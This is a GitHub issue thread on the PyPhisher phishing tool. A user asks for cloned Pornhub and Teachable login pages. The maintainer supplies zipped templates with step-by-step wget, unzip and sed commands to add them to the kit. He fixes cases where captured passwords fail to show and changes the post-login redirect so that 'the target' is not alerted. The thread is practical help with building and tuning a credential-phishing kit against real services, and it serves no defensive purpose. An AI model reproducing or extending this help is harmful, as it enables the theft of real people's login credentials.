### ISSUE TITLE
new template

### ISSUE THREAD

**Issue by niemajak900** [KasRoudra/PyPhisher#20]
[pornhub.zip](https://github.com/KasRoudra/PyPhisher/files/7679422/pornhub.zip)
Hi I found a pornhub login template. I was trying to test it but I got following error: The requested resource /login.html was not found on this server.

Is it possible that someone could upload this template to the software? :)

**Comment by KasRoudra** [comment]
[pornhub.zip](https://github.com/KasRoudra/PyPhisher/files/7681707/pornhub.zip)
@niemajak900 This is the fixed code. You can run this only in a php environmen

**Comment by KasRoudra** [comment]
Follow this commands in order. If you face any error in one command, DO NOT do the next.
1. `cd $HOME/PyPhisher`
2. `wget https://github.com/KasRoudra/PyPhisher/files/7681707/pornhub.zip`
3. `unzip pornhub.zip -d $HOME/.websites`
4. `sed "s+telegram+pornhub+g" pyphisher.py > p.py`
5. `rm -rf pyphisher.py`
6. `sed "s+Telegram+PornHub+g" p.py > pyphisher.py`
7. `rm -rf p.py`
8. `python3 pyphisher.py`
You will find pornhub in 36th option

**Comment by niemajak900** [comment]
> Follow this commands in order. If you face any error in one command, DO NOT do the next.
> 
>     1. `cd $HOME/PyPhisher`
> 
>     2. `wget https://github.com/KasRoudra/PyPhisher/files/7681707/pornhub.zip`
> 
>     3. `unzip pornhub.zip -d $HOME/.websites`
> 
>     4. `sed "s+telegram+pornhub+g" pyphisher.py > p.py`
> 
>     5. `rm -rf pyphisher.py`
> 
>     6. `sed "s+Telegram+PornHub+g" p.py > pyphisher.py`
> 
>     7. `rm -rf p.py`
> 
>     8. `python3 pyphisher.py`
>        You will find pornhub in 36th option

thank you it worked.

but when I tested it. it doesn't always work, few times when I typed login password it did not send my login details, I tried again and it did send me login details, I tried again and it did not send me login details. It works on and off for some reasons. this only happens when I use pornhub template. Other templates works 100% every time

**Comment by KasRoudra** [comment]
It also happened with me one time. I think logging in too fast bypasses loop check. There is a time delay of almost 2 seconds between printing ip and printing login. If you login in that time, login will not shown but will be saved silently. So it's better to login after website is fully loaded.(This html is large and takes time to load, we might log in at that time)

**Comment by niemajak900** [comment]
> It also happened with me one time. I think logging in too fast bypasses loop check. There is a time delay of almost 2 seconds between printing ip and printing login. If you login in that time, login will not shown but will be saved silently. So it's better to login after website is fully loaded.(This html is large and takes time to load, we might log in at that time)

thanks a lot. is it possible to add this template?: https://sso.teachable.com/secure/teachable_accounts/sign_in
I could send you $10 in BTC :)

**Comment by KasRoudra** [comment]
@niemajak900 Yeap. I've completed that site. I don't need money. Just star some of my [repositories](https://github.com/KasRoudra/KasRoudra#My-Best-Works) and I will upload that site for you.

**Comment by niemajak900** [comment]
> @niemajak900 Yeap. I've completed that site. I don't need money. Just star some of my [repositories](https://github.com/KasRoudra/KasRoudra#My-Best-Works) and I will upload that site for you.

thank you so much :)

**Comment by KasRoudra** [comment]
[teachable.zip](https://github.com/KasRoudra/PyPhisher/files/7685501/teachable.zip)
@niemajak900 This is source code. I am writing instructions, wait a while!

**Comment by KasRoudra** [comment]
Follow this commands in order. If you face any error in one command, DO NOT do the next.
1. `cd $HOME/PyPhisher`
2. `wget https://github.com/KasRoudra/PyPhisher/files/7685501/teachable.zip`
3. `mkdir $HOME/.websites/teachable` 
4. `unzip teachable.zip -d $HOME/.websites/teachable`
5. `sed "s+ajio+teachable+g" pyphisher.py > p.py`
6. `rm -rf pyphisher.py`
7. `sed "s+Ajio+Teachable+g" p.py > pyphisher.py`
8. `rm -rf p.py`
9. `python3 pyphisher.py`
You will find Teachable in 32th option!

**Comment by niemajak900** [comment]
> Follow this commands in order. If you face any error in one command, DO NOT do the next.
> 
> 1. `cd $HOME/PyPhisher`
> 2. `wget https://github.com/KasRoudra/PyPhisher/files/7685501/teachable.zip`
> 3. `mkdir $HOME/.websites/teachable`
> 4. `unzip teachable.zip -d $HOME/.websites/teachable`
> 5. `sed "s+ajio+teachable+g" pyphisher.py > p.py`
> 6. `rm -rf pyphisher.py`
> 7. `sed "s+Ajio+Teachable+g" p.py > pyphisher.py`
> 8. `rm -rf p.py`
> 9. `python3 pyphisher.py`
>    You will find Teachable in 32th option!

with this template a new issue come up when I try to open it:
open xdg-open? "https://integrity-fully-prompt-scheduled.trycloudflare.com wants to open this application. even if I allow I got information: failed to open url. the specified location is nor supported. it only happens to this template. and also it would be better if after the target enter the login details to redirect it to the main page instead of resetting password. :)

**Comment by KasRoudra** [comment]
I am not facing 1st issue and even didn't realize why or how this could happen. However I am changing redirection page. I hope your first issue was temporary
[teachable.zip](https://github.com/KasRoudra/PyPhisher/files/7685767/teachable.zip)
 # Steps
1. `cd $HOME/PyPhisher`
2. `wget https://github.com/KasRoudra/PyPhisher/files/7685767/teachable.zip`
3. `rm -rf $HOME/.websites/teachable/*`
4. `unzip teachable.zip -d $HOME/.websites/teachable`
5. `python3 pyphisher.py`

**Comment by niemajak900** [comment]
For some reason I still got the issue, and it is only with this template.

![2](https://user-images.githubusercontent.com/82961814/145416379-9c3b5ed5-7bc9-4c38-b17d-5de44b660ab4.png)
![1](https://user-images.githubusercontent.com/82961814/145416383-661208a1-cc50-4b3a-be78-a2d4f0b77ee5.png)

**Comment by KasRoudra** [comment]
Okay, I've found the culprit. Now try this
# Steps
[teachable.zip](https://github.com/KasRoudra/PyPhisher/files/7685912/teachable.zip)
1. `cd $HOME/PyPhisher`
2. `wget https://github.com/KasRoudra/PyPhisher/files/7685912/teachable.zip`
3. `rm -rf $HOME/.websites/teachable/*`
4. `unzip teachable.zip -d $HOME/.websites/teachable`
5. `python3 pyphisher.py

**Comment by niemajak900** [comment]
> 5\. `python3 pyphisher.py`

fixed. thank you

**Comment by markmark94** [comment]
potrei chiederti se sarebbe possibile aggiungere un sito italiano?

**Comment by markmark94** [comment]
o per meglio dire ho capito piu o meno come si aggiunge ma non mi rida indietro le informazioni
